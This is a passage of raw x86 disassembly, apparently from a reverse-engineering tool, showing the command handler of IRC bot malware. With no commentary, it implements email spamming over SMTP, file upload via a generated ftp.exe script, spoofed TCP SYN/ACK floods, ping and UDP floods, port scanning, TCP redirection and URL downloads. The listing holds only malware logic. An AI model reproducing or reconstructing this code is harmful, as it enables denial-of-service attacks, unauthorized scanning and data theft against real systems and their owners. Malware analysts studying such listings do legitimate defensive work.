mov eax, [edi+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+Drive], eax
call dword_42EBB4 ; htons
mov [ebp+var_2D6], ax
lea eax, [ebp+var_548]
push eax
lea eax, [ebp+var_D9C]
push eax
lea eax, [ebp+var_548]
push eax
lea eax, [ebp+var_B94]
push eax
lea eax, [ebp+var_D9C]
push eax
lea eax, [ebp+var_159C]
push offset aHeloRndnickMai ; "helo $rndnick\nmail from: <%s>\nrcpt to: "...
push eax ; Dest
call _sprintf
add esp, 1Ch
lea eax, [ebp+var_2D8]
push 10h
push eax
push esi
call dword_42EB60 ; connect
mov edi, 100h
push ebx
lea eax, [ebp+var_C98]
push edi
push eax
push esi
call dword_42EBCC ; recv
lea eax, [ebp+var_C98]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_159C]
push eax
push esi
call dword_42EC00 ; send
push ebx
lea eax, [ebp+var_C98]
push edi
push eax
push esi
call dword_42EBCC ; recv
push esi
call dword_42EC48 ; closesocket
call dword_42EB20 ; WSACleanup
lea eax, [ebp+var_B94]
push eax
push offset aEmailMessageSe ; "[EMAIL]: Message sent to %s."
loc_40B78A: ; CODE XREF: sub_409557+33A8�j
; sub_409557+35BA�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40B799: ; CODE XREF: sub_409557+338C�j
; sub_409557+356C�j ...
cmp [ebp+var_8], ebx
jnz loc_40E43D
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_405E64
add esp, 14h
jmp loc_40E43D
; ---------------------------------------------------------------------------
loc_40B7C3: ; CODE XREF: sub_409557+20DD�j
push [ebp+Dest] ; Str2
push offset aHttpcon ; "httpcon"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40B994
push [ebp+Dest] ; Str2
push offset aHcon ; "hcon"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40B994
mov esi, [ebp+esi+Format]
cmp esi, ebx
jz loc_4099D2
push [ebp+Dest] ; Str2
push offset aUpload ; "upload"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40E7D9
push 4
push esi
call sub_403A2F
pop ecx
test eax, eax
pop ecx
jnz short loc_40B869
push esi
push offset aFtpFileNotFoun ; "[FTP]: File not found: %s."
loc_40B828: ; CODE XREF: sub_409557+25EF�j
; sub_409557+2BA5�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40B837: ; CODE XREF: sub_409557+25D3�j
; sub_409557+2B89�j ...
cmp [ebp+var_8], ebx
jnz short loc_40B858
push ebx ; int
push [ebp+var_4] ; int
loc_40B840: ; CODE XREF: sub_409557+31B8�j
lea eax, [ebp+Dst]
push eax ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
loc_40B850: ; CODE XREF: sub_409557+4943�j
call sub_405E64
add esp, 14h
loc_40B858: ; CODE XREF: sub_409557+22E3�j
; sub_409557+2722�j ...
lea eax, [ebp+Dst]
push eax
call sub_402D63
jmp loc_40E966
; ---------------------------------------------------------------------------
loc_40B869: ; CODE XREF: sub_409557+22C9�j
call ds:dword_41B078 ; GetTickCount
push eax
call sub_41274C
pop ecx
call _rand
push 9
cdq
pop ecx
idiv ecx
push edx
call _rand
push 63h
cdq
pop ecx
idiv ecx
push edx
call _rand
cdq
mov ecx, 3E7h
idiv ecx
lea eax, [ebp+var_C9C]
push edx
push eax
lea eax, [ebp+Filename]
push offset aSIII_dll ; "%s\\%i%i%i.dll"
push eax ; Dest
call _sprintf
lea eax, [ebp+Filename]
push offset aAb ; "ab"
push eax ; Filename
call _fopen
add esp, 20h
cmp eax, ebx
mov [ebp+File], eax
jz loc_4099D2
push esi
push [ebp+arg_8]
push [ebp+Src]
push [ebp+Str1]
push edi
push offset aOpenSSSSPutSBy ; "open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
push eax ; File
call _fprintf
push [ebp+File] ; File
call _fclose
lea eax, [ebp+Filename]
push eax
lea eax, [ebp+var_3E4]
push offset aSS_4 ; "-s:%s"
push eax ; Dest
call _sprintf
add esp, 2Ch
lea eax, [ebp+var_3E4]
push ebx
push ebx
push eax
push offset aFtp_exe ; "ftp.exe"
push offset aOpen ; "open"
push ebx
call dword_42EB34
test eax, eax
push edi
push esi ; Format
jz short loc_40B933
push offset aFtpUploadingFi ; "[FTP]: Uploading file: %s to: %s"
jmp short loc_40B938
; ---------------------------------------------------------------------------
loc_40B933: ; CODE XREF: sub_409557+23D3�j
push offset aFtpUploading_0 ; "[FTP]: Uploading file: %s to: %s failed"...
loc_40B938: ; CODE XREF: sub_409557+23DA�j
call _sprintf
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_40B961
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_405E64
add esp, 14h
loc_40B961: ; CODE XREF: sub_409557+23EC�j
lea eax, [ebp+Dst]
push eax
call sub_402D63
loc_40B96D: ; CODE XREF: sub_409557+243B�j
lea eax, [ebp+Filename]
push 4
push eax
call sub_403A2F
add esp, 0Ch
test eax, eax
jz loc_4099D2
lea eax, [ebp+Filename]
push eax
call sub_413BB6
jmp short loc_40B96D
; ---------------------------------------------------------------------------
loc_40B994: ; CODE XREF: sub_409557+227D�j
; sub_409557+2294�j
push [ebp+esi+Format]
push [ebp+arg_8]
push [ebp+Src]
push [ebp+Str1] ; Str
call _atoi
pop ecx
push eax
push edi
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40576B
jmp loc_40E7D6
; ---------------------------------------------------------------------------
loc_40B9C2: ; CODE XREF: sub_409557+20AF�j
; sub_409557+20C6�j
mov esi, 80h
push edi ; Format
lea eax, [ebp+var_680]
push esi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+var_680]
push eax ; Str2
push offset aSyn_0 ; "syn"
call _strcmp
add esp, 14h
test eax, eax
jz short loc_40BA25
lea eax, [ebp+var_680]
push eax ; Str2
push offset aAck ; "ack"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40BA25
lea eax, [ebp+var_680]
push eax ; Str2
push offset aRandom ; "random"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40BA25
push offset aTcpInvalidFloo ; "[TCP]: Invalid flood type specified."
jmp loc_40DFA0
; ---------------------------------------------------------------------------
loc_40BA25: ; CODE XREF: sub_409557+2494�j
; sub_409557+24AB�j ...
push [ebp+arg_8] ; Str
call _atoi
cmp eax, ebx
pop ecx
mov [ebp+var_578], eax
jle loc_40BB4B
push edi ; Format
lea eax, [ebp+var_680]
push esi ; Count
push eax ; Dest
call __snprintf
push [ebp+Str1] ; Format
lea eax, [ebp+var_700]
push esi ; Count
push eax ; Dest
call __snprintf
push [ebp+Src] ; Str
call _atoi
mov [ebp+var_57C], eax
xor eax, eax
cmp [ebp+var_9A2], bl
push [ebp+var_8C] ; Format
setnz al
mov [ebp+var_574], eax
mov eax, [ebp+arg_4]
mov [ebp+var_704], eax
lea eax, [ebp+var_600]
push esi ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+var_4]
add esp, 28h
cmp [ebp+var_574], ebx
mov [ebp+var_570], eax
mov eax, [ebp+var_8]
mov [ebp+var_56C], eax
mov eax, offset aSpoofed ; "Spoofed"
jnz short loc_40BABC
mov eax, offset aNormal ; "Normal"
loc_40BABC: ; CODE XREF: sub_409557+255E�j
push [ebp+arg_8]
push [ebp+Src]
push [ebp+Str1]
push edi
push eax
push offset aTcpSSFloodingS ; "[TCP]: %s %s flooding: (%s:%s) for %s s"...
lea eax, [ebp+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
push ebx ; int
lea eax, [ebp+Dst]
push 0Ch ; int
push eax ; Source
call sub_411C3A
add esp, 2Ch
mov [ebp+var_580], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_704]
push ebx
push eax
push offset sub_4111FF
push ebx
push ebx
call ds:dword_41B064 ; CreateThread
mov ecx, [ebp+var_580]
imul ecx, 234h
cmp eax, ebx
mov dword_430554[ecx], eax
jz short loc_40BB3A
loc_40BB24: ; CODE XREF: sub_409557+25E1�j
cmp [ebp+var_568], ebx
jnz loc_40B837
push 32h
call ds:dword_41B048 ; Sleep
jmp short loc_40BB24
; ---------------------------------------------------------------------------
loc_40BB3A: ; CODE XREF: sub_409557+25CB�j
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
push offset aTcpFailedToSta ; "[TCP]: Failed to start flood thread, er"...
jmp loc_40B828
; ---------------------------------------------------------------------------
loc_40BB4B: ; CODE XREF: sub_409557+24DF�j
push offset aTcpInvalidFl_0 ; "[TCP]: Invalid flood time must be great"...
jmp loc_40DFA0
; ---------------------------------------------------------------------------
loc_40BB55: ; CODE XREF: sub_409557+206A�j
; sub_409557+2081�j ...
cmp dword_42ECA0, ebx
mov esi, [ebp+arg_4]
jnz loc_40BC5D
mov eax, [ebp+var_8]
push 7Fh ; Count
mov [ebp+var_2EC], eax
mov eax, [ebp+var_4]
mov [ebp+var_2F0], eax
lea eax, [ebp+var_384]
push edi ; Source
push eax ; Dest
call _strncpy
push [ebp+Str1] ; Str
call _atoi
push [ebp+Src] ; Str
mov [ebp+var_304], eax
call _atoi
push [ebp+arg_8] ; Str
mov [ebp+var_300], eax
call _atoi
push 7Fh ; Count
mov [ebp+var_2FC], eax
push [ebp+var_8C] ; Source
lea eax, [ebp+var_404]
push eax ; Dest
call _strncpy
push [ebp+var_2FC]
lea eax, [ebp+var_384]
mov [ebp+var_408], esi
push [ebp+var_300]
push eax
lea eax, [ebp+Dst]
push [ebp+var_304]
push offset aPingSendingDPi ; "[PING]: Sending %d pings to %s. packet "...
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 0Eh ; int
push eax ; Source
call sub_411C3A
add esp, 48h
mov [ebp+var_2F4], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_408]
push ebx
push eax
push offset sub_4084A7
push ebx
push ebx
call ds:dword_41B064 ; CreateThread
mov ecx, [ebp+var_2F4]
imul ecx, 234h
cmp eax, ebx
mov dword_430554[ecx], eax
jz short loc_40BC4C
loc_40BC3A: ; CODE XREF: sub_409557+26F3�j
cmp [ebp+var_2E8], ebx
jnz short loc_40BC76
push 32h
call ds:dword_41B048 ; Sleep
jmp short loc_40BC3A
; ---------------------------------------------------------------------------
loc_40BC4C: ; CODE XREF: sub_409557+26E1�j
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
push offset aPingFailedToSt ; "[PING]: Failed to start flood thread, e"...
jmp loc_40C808
; ---------------------------------------------------------------------------
loc_40BC5D: ; CODE XREF: sub_409557+2607�j
push 1FFh ; Count
lea eax, [ebp+Dst]
push offset aIcmp_dllNotAva ; "ICMP.dll not available"
push eax ; Dest
call _strncpy
loc_40BC73: ; CODE XREF: sub_409557+32BD�j
add esp, 0Ch
loc_40BC76: ; CODE XREF: sub_409557+26E9�j
; sub_409557+2830�j ...
cmp [ebp+var_8], ebx
jnz loc_40B858
push ebx
push [ebp+var_4]
jmp loc_40DE8C
; ---------------------------------------------------------------------------
loc_40BC88: ; CODE XREF: sub_409557+2025�j
; sub_409557+203C�j ...
mov eax, [ebp+var_8]
push 7Fh ; Count
mov [ebp+var_2EC], eax
mov eax, [ebp+var_4]
mov [ebp+var_2F0], eax
lea eax, [ebp+var_384]
push edi ; Source
push eax ; Dest
call _strncpy
push [ebp+Str1] ; Str
call _atoi
push [ebp+Src] ; Str
mov [ebp+var_304], eax
call _atoi
push [ebp+arg_8] ; Str
mov [ebp+var_300], eax
call _atoi
mov esi, [ebp+esi+Format]
add esp, 18h
cmp esi, ebx
mov [ebp+var_2FC], eax
jz short loc_40BCED
push esi ; Str
call _atoi
pop ecx
mov [ebp+var_2F8], eax
jmp short loc_40BCF3
; ---------------------------------------------------------------------------
loc_40BCED: ; CODE XREF: sub_409557+2785�j
mov [ebp+var_2F8], ebx
loc_40BCF3: ; CODE XREF: sub_409557+2794�j
push 7Fh ; Count
lea eax, [ebp+var_404]
push [ebp+var_8C] ; Source
push eax ; Dest
call _strncpy
push [ebp+var_2FC]
mov esi, [ebp+arg_4]
lea eax, [ebp+var_384]
mov [ebp+var_408], esi
push [ebp+var_300]
push eax
lea eax, [ebp+Dst]
push [ebp+var_304]
push offset aUdpSendingDPac ; "[UDP]: Sending %d packets to: %s. Packe"...
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 0Fh ; int
push eax ; Source
call sub_411C3A
add esp, 30h
mov [ebp+var_2F4], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_408]
push ebx
push eax
push offset sub_408633
push ebx
push ebx
call ds:dword_41B064 ; CreateThread
mov ecx, [ebp+var_2F4]
imul ecx, 234h
cmp eax, ebx
mov dword_430554[ecx], eax
jz short loc_40BD97
loc_40BD81: ; CODE XREF: sub_409557+283E�j
cmp [ebp+var_2E8], ebx
jnz loc_40BC76
push 32h
call ds:dword_41B048 ; Sleep
jmp short loc_40BD81
; ---------------------------------------------------------------------------
loc_40BD97: ; CODE XREF: sub_409557+2828�j
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
push offset aUdpFailedToSta ; "[UDP]: Failed to start flood thread, er"...
jmp loc_40C808
; ---------------------------------------------------------------------------
loc_40BDA8: ; CODE XREF: sub_409557+1FF7�j
; sub_409557+200E�j
push 8
call sub_411E82
push [ebp+Str1] ; Str
mov [ebp+Dest], eax
call _atoi
add eax, [ebp+Dest]
pop ecx
pop ecx
cmp eax, 258h
jle short loc_40BDFB
push [ebp+Dest]
lea eax, [ebp+Dst]
push offset aScanAlreadyDSc ; "[SCAN]: Already %d scanning threads. To"...
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_405E64
loc_40BDF3: ; CODE XREF: sub_409557+3C1D�j
add esp, 20h
jmp loc_40E7D9
; ---------------------------------------------------------------------------
loc_40BDFB: ; CODE XREF: sub_409557+286D�j
push edi ; Str
call _atoi
push [ebp+Str1] ; Str
mov [ebp+var_31C], eax
call _atoi
push [ebp+Src] ; Str
mov [ebp+var_304], eax
call _atoi
add esp, 0Ch
cmp eax, 5
mov [ebp+var_318], eax
jnb short loc_40BE34
push 5
pop eax
mov [ebp+var_318], eax
loc_40BE34: ; CODE XREF: sub_409557+28D2�j
push 3Ch
pop ecx
cmp eax, ecx
jbe short loc_40BE41
mov [ebp+var_318], ecx
loc_40BE41: ; CODE XREF: sub_409557+28E2�j
push [ebp+arg_8] ; Str
call _atoi
mov [ebp+var_314], eax
mov eax, 320h
cmp [ebp+var_314], eax
pop ecx
jbe short loc_40BE63
mov [ebp+var_314], eax
loc_40BE63: ; CODE XREF: sub_409557+2904�j
or [ebp+var_300], 0FFFFFFFFh
cmp dword_41F090, ebx
mov [ebp+arg_8], ebx
jz short loc_40BEB9
mov [ebp+File], offset dword_41F090
loc_40BE7C: ; CODE XREF: sub_409557+2944�j
mov eax, [ebp+File]
push edi ; Str2
add eax, 0FFFFFFD8h
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40BE9F
add [ebp+File], 3Ch
inc [ebp+arg_8]
mov eax, [ebp+File]
cmp [eax], ebx
jnz short loc_40BE7C
jmp short loc_40BEB9
; ---------------------------------------------------------------------------
loc_40BE9F: ; CODE XREF: sub_409557+2936�j
mov eax, [ebp+arg_8]
mov ecx, eax
mov [ebp+var_300], eax
imul ecx, 3Ch
mov ecx, dword_41F090[ecx]
mov [ebp+var_31C], ecx
loc_40BEB9: ; CODE XREF: sub_409557+291C�j
; sub_409557+2946�j
cmp [ebp+var_31C], ebx
jz loc_40DA85
mov edi, [ebp+esi+Format]
cmp edi, ebx
mov [ebp+Str1], edi
jz short loc_40BF00
cmp byte ptr [edi], 23h
jz short loc_40BF00
push edi ; Format
lea eax, [ebp+var_430]
push 10h ; Count
push eax ; Dest
call __snprintf
push 78h ; Val
push edi ; Str
call _strchr
add esp, 14h
neg eax
sbb eax, eax
neg eax
mov [ebp+var_2F0], eax
jmp loc_40BFD4
; ---------------------------------------------------------------------------
loc_40BF00: ; CODE XREF: sub_409557+2977�j
; sub_409557+297C�j
cmp [ebp+var_9B3], bl
jnz short loc_40BF22
cmp [ebp+var_9B2], bl
jnz short loc_40BF22
cmp [ebp+var_9A2], bl
jnz short loc_40BF22
push offset aScanFailedTo_0 ; "[SCAN]: Failed to start scan, no IP spe"...
jmp loc_40DFA0
; ---------------------------------------------------------------------------
loc_40BF22: ; CODE XREF: sub_409557+29AF�j
; sub_409557+29B7�j ...
push 10h
lea eax, [ebp+Src]
pop edi
push eax
lea eax, [ebp+var_2D8]
push eax
mov [ebp+Src], edi
push [ebp+arg_4]
call dword_42EB5C ; getsockname
mov al, [ebp+var_9B3]
push edi ; Args
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp+Drive], eax
push [ebp+Drive] ; Count
call dword_42EC3C ; inet_ntoa
push eax ; Source
lea eax, [ebp+var_430]
push eax ; Dest
call _strncpy
add esp, 0Ch
cmp [ebp+var_9A2], bl
jz short loc_40BFCE
xor eax, eax
cmp [ebp+var_9B3], bl
push 30h ; Ch
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+var_430]
push eax ; Str
call _strrchr
pop ecx
cmp edi, ebx
pop ecx
mov byte ptr [ebp+File+3], bl
jle short loc_40BFC2
loc_40BFA0: ; CODE XREF: sub_409557+2A69�j
cmp eax, ebx
jz short loc_40BFC2
mov byte ptr [eax], 78h
lea eax, [ebp+var_430]
push 30h ; Ch
push eax ; Str
call _strrchr
inc byte ptr [ebp+File+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+File+3]
cmp ecx, edi
jl short loc_40BFA0
loc_40BFC2: ; CODE XREF: sub_409557+2A47�j
; sub_409557+2A4B�j
mov [ebp+var_2F0], 1
jmp short loc_40BFD4
; ---------------------------------------------------------------------------
loc_40BFCE: ; CODE XREF: sub_409557+2A21�j
mov [ebp+var_2F0], ebx
loc_40BFD4: ; CODE XREF: sub_409557+29A4�j
; sub_409557+2A75�j
mov eax, [ebp+arg_4]
push [ebp+var_8C] ; Format
mov [ebp+var_320], eax
mov eax, [ebp+var_4]
mov [ebp+var_2F8], eax
mov eax, [ebp+var_8]
mov [ebp+var_2F4], eax
mov edi, 80h
lea eax, [ebp+var_420]
push edi ; Count
push eax ; Dest
call __snprintf
mov esi, [ebp+esi+var_7C]
add esp, 0Ch
cmp esi, ebx
jz short loc_40C025
loc_40C012: ; CODE XREF: sub_409557+2AF1�j
push esi ; Format
loc_40C013: ; CODE XREF: sub_409557+2ADB�j
lea eax, [ebp+var_3A0]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_40C050
; ---------------------------------------------------------------------------
loc_40C025: ; CODE XREF: sub_409557+2AB9�j
mov eax, [ebp+Str1]
cmp eax, ebx
jz short loc_40C034
cmp byte ptr [eax], 23h
jnz short loc_40C034
push eax
jmp short loc_40C013
; ---------------------------------------------------------------------------
loc_40C034: ; CODE XREF: sub_409557+2AD3�j
; sub_409557+2AD8�j
mov esi, offset aFf_0 ; "#ff-"
push offset byte_428D64 ; Str2
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40C012
mov [ebp+var_3A0], bl
loc_40C050: ; CODE XREF: sub_409557+2ACC�j
cmp [ebp+var_2F0], ebx
mov eax, offset aRandom_0 ; "Random"
jnz short loc_40C062
mov eax, offset aSequential ; "Sequential"
loc_40C062: ; CODE XREF: sub_409557+2B04�j
push [ebp+var_304]
lea ecx, [ebp+var_430]
push [ebp+var_314]
push [ebp+var_318]
push [ebp+var_31C]
push ecx
push eax
lea eax, [ebp+Dst]
push offset aScanSPortScanS ; "[SCAN]: %s Port Scan started on %s:%d w"...
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 8 ; int
push eax ; Source
call sub_411C3A
add esp, 2Ch
mov [ebp+var_310], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_430]
push ebx
push eax
push offset sub_402A0C
push ebx
push ebx
call ds:dword_41B064 ; CreateThread
mov ecx, [ebp+var_310]
imul ecx, 234h
cmp eax, ebx
mov dword_430554[ecx], eax
jz short loc_40C0F0
loc_40C0DA: ; CODE XREF: sub_409557+2B97�j
cmp [ebp+var_2EC], ebx
jnz loc_40B837
push 32h
call ds:dword_41B048 ; Sleep
jmp short loc_40C0DA
; ---------------------------------------------------------------------------
loc_40C0F0: ; CODE XREF: sub_409557+2B81�j
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
push offset aScanFailedTo_1 ; "[SCAN]: Failed to start scan thread, er"...
jmp loc_40B828
; ---------------------------------------------------------------------------
loc_40C101: ; CODE XREF: sub_409557+1FB7�j
; sub_409557+1FCE�j
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
cmp byte_430558[eax], bl
jz loc_40E7D9
cmp [ebp+var_C], ebx
jz loc_40E7D9
push edi ; Str
call _strlen
push [ebp+Dest] ; Str
mov esi, eax
call _strlen
push [ebp+Str1] ; Str
add esi, eax
call _strlen
add eax, [ebp+var_C]
push [ebp+Src] ; SubStr
lea eax, [eax+esi+2]
push eax ; Str
call _strstr
mov esi, eax
lea eax, [ebp+Dst]
push esi
push offset dword_42653C ; Format
push eax ; Dest
call _sprintf
add esp, 20h
cmp esi, ebx
jz loc_40E7D9
push edi ; Str
call _atoi
test eax, eax
pop ecx
jle loc_40E7D9
push edi ; Str
call _atoi
cmp eax, 1F4h
pop ecx
jge loc_40E7D9
push ebx ; int
lea eax, [ebp+Dst]
push ebx ; int
push eax ; int
push [ebp+Str1] ; Str
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_43054C[eax] ; int
call sub_405E64
push edi ; Str
call _atoi
imul eax, 234h
add esp, 18h
cmp byte ptr dword_430340[eax], 73h
jnz loc_40E7D9
push esi
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
add eax, offset byte_430558
push eax
push [ebp+Str1]
push offset aSSS_1 ; "[%s] * %s %s"
loc_40C1E9: ; CODE XREF: sub_409557+2D8F�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_405E64
loc_40C20E: ; CODE XREF: sub_409557+4B11�j
add esp, 28h
jmp loc_40E7D9
; ---------------------------------------------------------------------------
loc_40C216: ; CODE XREF: sub_409557+1F89�j
; sub_409557+1FA0�j
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
cmp byte_430558[eax], bl
jz loc_40E7D9
cmp [ebp+var_C], ebx
jz loc_40E7D9
push edi ; Str
call _strlen
push [ebp+Dest] ; Str
mov esi, eax
call _strlen
push [ebp+Str1] ; Str
add esi, eax
call _strlen
add eax, [ebp+var_C]
push [ebp+Src] ; SubStr
lea eax, [eax+esi+2]
push eax ; Str
call _strstr
mov esi, eax
add esp, 14h
cmp esi, ebx
jz loc_40E7D9
push edi ; Str
call _atoi
test eax, eax
pop ecx
jle loc_40E7D9
push edi ; Str
call _atoi
cmp eax, 1F4h
pop ecx
jge loc_40E7D9
push ebx ; int
push ebx ; int
push esi ; int
push [ebp+Str1] ; Str
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_43054C[eax] ; int
call sub_405E64
push edi ; Str
call _atoi
imul eax, 234h
add esp, 18h
cmp byte ptr dword_430340[eax], 73h
jnz loc_40E7D9
push esi
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
add eax, offset byte_430558
push eax
push [ebp+Str1]
push offset aSSS_2 ; "[%s] <%s> %s"
jmp loc_40C1E9
; ---------------------------------------------------------------------------
loc_40C2EB: ; CODE XREF: sub_409557+1F5B�j
; sub_409557+1F72�j
push edi
call dword_42EBF0 ; inet_addr
push [ebp+Str1] ; Str
mov [ebp+var_460], eax
call _atoi
push [ebp+Src] ; Str
mov [ebp+var_46C], eax
call _atoi
mov esi, [ebp+arg_4]
push 7Fh ; Count
push [ebp+var_8C] ; Source
mov [ebp+var_468], eax
lea eax, [ebp+var_4EC]
mov [ebp+var_4F0], esi
push eax ; Dest
call _strncpy
add esp, 14h
mov edi, [ebp+var_4]
mov eax, [ebp+var_8]
mov [ebp+var_458], edi
push [ebp+var_468]
mov [ebp+var_454], eax
push [ebp+var_46C]
push [ebp+var_460]
call dword_42EC3C ; inet_ntoa
push eax
lea eax, [ebp+Dst]
push offset aScanPortScanSt ; "[SCAN]: Port scan started: %s:%d with d"...
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 8 ; int
push eax ; Source
call sub_411C3A
add esp, 20h
mov [ebp+var_464], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4F0]
push ebx
push eax
push offset sub_40FB6E
push ebx
push ebx
call ds:dword_41B064 ; CreateThread
mov ecx, [ebp+var_464]
imul ecx, 234h
cmp eax, ebx
mov dword_430554[ecx], eax
jz short loc_40C3CD
loc_40C3B7: ; CODE XREF: sub_409557+2E74�j
cmp [ebp+var_450], ebx
jnz loc_40DE81
push 32h
call ds:dword_41B048 ; Sleep
jmp short loc_40C3B7
; ---------------------------------------------------------------------------
loc_40C3CD: ; CODE XREF: sub_409557+2E5E�j
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
push offset aScanFailedTo_1 ; "[SCAN]: Failed to start scan thread, er"...
jmp loc_40DE72
; ---------------------------------------------------------------------------
loc_40C3DE: ; CODE XREF: sub_409557+1F2D�j
; sub_409557+1F44�j
push edi ; Str
call _atoi
push 7Fh ; Count
mov [ebp+var_300], eax
push [ebp+Str1] ; Source
lea eax, [ebp+var_404]
push eax ; Dest
call _strncpy
push [ebp+Src] ; Str
call _atoi
push [ebp+var_8C] ; Format
mov esi, [ebp+arg_4]
mov [ebp+var_304], eax
lea eax, [ebp+var_384]
push 80h ; Count
push eax ; Dest
mov [ebp+var_40C], esi
call __snprintf
mov eax, [ebp+var_8]
add esp, 20h
mov edi, [ebp+var_4]
mov [ebp+var_2F0], eax
push [ebp+var_304]
lea eax, [ebp+var_404]
mov [ebp+var_2F4], edi
push eax
push [ebp+var_300]
push esi
call sub_408401
pop ecx
push eax
lea eax, [ebp+Dst]
push offset aRedirectTcpRed ; "[REDIRECT]: TCP redirect created from: "...
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 10h ; int
push eax ; Source
call sub_411C3A
add esp, 24h
mov [ebp+var_2FC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_40C]
push ebx
push eax
push offset sub_40E9B2
push ebx
push ebx
call ds:dword_41B064 ; CreateThread
mov ecx, [ebp+var_2FC]
imul ecx, 234h
cmp eax, ebx
mov dword_430554[ecx], eax
jz short loc_40C4C7
loc_40C4B1: ; CODE XREF: sub_409557+2F6E�j
cmp [ebp+var_2EC], ebx
jnz loc_40DE81
push 32h
call ds:dword_41B048 ; Sleep
jmp short loc_40C4B1
; ---------------------------------------------------------------------------
loc_40C4C7: ; CODE XREF: sub_409557+2F58�j
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
push offset aRedirectFailed ; "[REDIRECT]: Failed to start redirection"...
jmp loc_40DE72
; ---------------------------------------------------------------------------
loc_40C4D8: ; CODE XREF: sub_409557+1EFF�j
; sub_409557+1F16�j
push 0FFh ; Count
lea eax, [ebp+var_788]
push edi ; Source
push eax ; Dest
call _strncpy
push 0FFh ; Count
lea eax, [ebp+var_688]
push [ebp+Str1] ; Source
push eax ; Dest
call _strncpy
push [ebp+Src] ; Str
mov [ebp+var_584], ebx
call _atoi
mov [ebp+var_580], eax
mov eax, [ebp+esi+Str]
add esp, 1Ch
cmp eax, ebx
jz short loc_40C534
push 10h ; Radix
push ebx ; EndPtr
push eax ; Str
call _strtoul
add esp, 0Ch
mov [ebp+var_578], eax
jmp short loc_40C53A
; ---------------------------------------------------------------------------
loc_40C534: ; CODE XREF: sub_409557+2FC7�j
mov [ebp+var_578], ebx
loc_40C53A: ; CODE XREF: sub_409557+2FDB�j
mov esi, [ebp+esi+Format]
cmp esi, ebx
jz short loc_40C551
push esi ; Str
call _atoi
pop ecx
mov [ebp+var_57C], eax
jmp short loc_40C557
; ---------------------------------------------------------------------------
loc_40C551: ; CODE XREF: sub_409557+2FE9�j
mov [ebp+var_57C], ebx
loc_40C557: ; CODE XREF: sub_409557+2FF8�j
movzx eax, [ebp+var_9AF]
mov esi, [ebp+arg_4]
push 7Fh ; Count
push [ebp+var_8C] ; Source
mov [ebp+var_574], eax
lea eax, [ebp+var_808]
mov [ebp+var_80C], esi
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
push [ebp+Str1]
mov [ebp+var_56C], eax
mov eax, [ebp+var_8]
mov [ebp+var_570], eax
push edi
lea eax, [ebp+Dst]
push offset aDownloadDown_1 ; "[DOWNLOAD]: Downloading URL: %s to: %s."...
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dst]
push 15h ; int
push eax ; Source
call sub_411C3A
add esp, 28h
mov [ebp+var_588], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_80C]
push ebx
push eax
push offset sub_403520
push ebx
push ebx
call ds:dword_41B064 ; CreateThread
mov ecx, [ebp+var_588]
imul ecx, 234h
cmp eax, ebx
